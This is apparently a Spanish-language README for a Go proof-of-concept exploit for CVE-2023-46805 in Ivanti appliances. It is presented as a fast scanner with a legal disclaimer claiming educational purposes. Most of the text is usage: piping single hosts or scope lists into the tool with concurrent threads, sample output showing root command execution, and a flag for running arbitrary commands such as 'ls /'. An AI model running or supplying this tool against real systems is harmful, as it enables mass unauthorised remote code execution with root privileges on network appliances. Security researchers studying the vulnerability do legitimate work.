
CVE-2023-46805 Ivanti POC RCE - Escáner ultrarrápido.
Título: Prueba de Concepto para CVE-2023-46805 - Solo para Fines Educativos
Licencia: Este trabajo se encuentra bajo la Licencia Creative Commons Attribution 4.0 International (CC BY 4.0). Eres libre de compartir, copiar, distribuir y transmitir este trabajo, de adaptarlo o utilizarlo para otros fines, siempre que se atribuya adecuadamente la autoría.
Aviso legal: Esta Prueba de Concepto (PoC) se proporciona únicamente con fines educativos y de investigación en ciberseguridad. Ni el autor, ni la organización afiliada, ni ninguna otra parte involucrada en la creación, producción o entrega de este contenido será responsable de ningún daño, incluidos, entre otros, daños directos, indirectos, incidentales, especiales, consecuentes o punitivos derivados del uso o de la imposibilidad de utilizar este contenido.
Objetivo educativo: Esta PoC tiene como finalidad ayudar a la comunidad de ciberseguridad a comprender y mitigar la vulnerabilidad identificada como CVE-2023-46805. No debe utilizarse en un entorno de producción ni para actividades maliciosas.
Descripción de la vulnerabilidad: Ivanti RCE
Detalles de la PoC:
Usage of ./CVE-Ivanti:
-cmd string
The command to replace 'id' in the payload (default "id")
-t int
Number of concurrent threads (default 5)
go build
echo "https://1.2.3.4" | ./CVE-Ivanti
https://1.2.3.4 {"error": "uid=0(root) gid=0(root) groups=0(root)\n"}
cat myscope.txt -t 5 | ./CVE-Ivanti
https://ssl1.mysite.com:443 {"error": "uid=0(root) gid=0(root) groups=0(root)\n"}
https://ssl3.mysite.com:443 {"error": "uid=0(root) gid=0(root) groups=0(root)\n"}
echo "https://1.2.3.4" | ./CVE-Ivanti -cmd 'ls /'